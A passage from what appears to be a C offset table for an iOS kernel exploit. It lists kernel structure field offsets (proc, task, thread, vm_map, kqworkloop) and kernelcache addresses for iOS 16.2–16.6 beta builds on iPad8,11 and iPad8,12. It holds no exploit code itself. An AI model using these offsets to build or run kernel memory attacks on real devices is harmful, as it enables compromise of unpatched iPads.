.fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,12 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,12", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,12", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,12", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,12", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, 